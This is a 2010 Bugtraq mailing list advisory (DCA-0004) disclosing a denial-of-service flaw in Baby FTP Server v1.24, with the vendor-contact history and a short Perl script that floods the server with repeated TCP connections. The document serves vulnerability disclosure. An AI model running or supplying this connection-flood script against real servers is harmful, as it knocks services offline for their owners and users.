Bugtraqmailing list archives

By Date

By Thread

[DCA-0004] Baby FTP Server DoS

[DCA-0004][Software] - Baby FTP Server[Vendor Product Description] - Baby FTP server has only the most necessary features and is yetpowerful enough to be a basis for a more complex server[Bug Description] - The FTP Server can't handle multiple/simultaneous connectionsleading to Denial-of-Service[History] - Advisory sent to vendor on 06/14/2010. - No response from vendor - Public advisory & exploit 08/02/2010.[Impact] - Low[Affected Version] - Baby FTP Server v1.24 - Prior versions may also be vulnerable[Code]#!/usr/bin/perluse IO::Socket;        if (@ARGV < 1) {                usage();        }        $ip     = $ARGV[0];        $port   = $ARGV[1];        $conn   = $ARGV[2];        $num    = 0;        print "[+] Sending request...\n";        while ( $num <= $conn ) {                system("echo -n .");                $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";        close($s);        $num++;        }        print "\n[+] Done!\n";sub usage() {        print "[-] Usage: <". $0 ."> <host> <port> <num-conn>\n";        print "[-] Example: ". $0 ." 127.0.0.1 21 1200\n";        exit;}[Credits]Rodrigo Escobar (ipax)Pentester/Researcher Security Team @ DcLabshttp://www.dclabs.com.br[Greetz]Crash and all Dclabs members.-- Rodrigo Escobar (ipax)Pentester/Researcher Security Team @ DcLabshttp://www.dclabs.com.br

By Date

By Thread

Current thread:

• [DCA-0004] Baby FTP Server DoSRodrigo Escobar (Aug 02)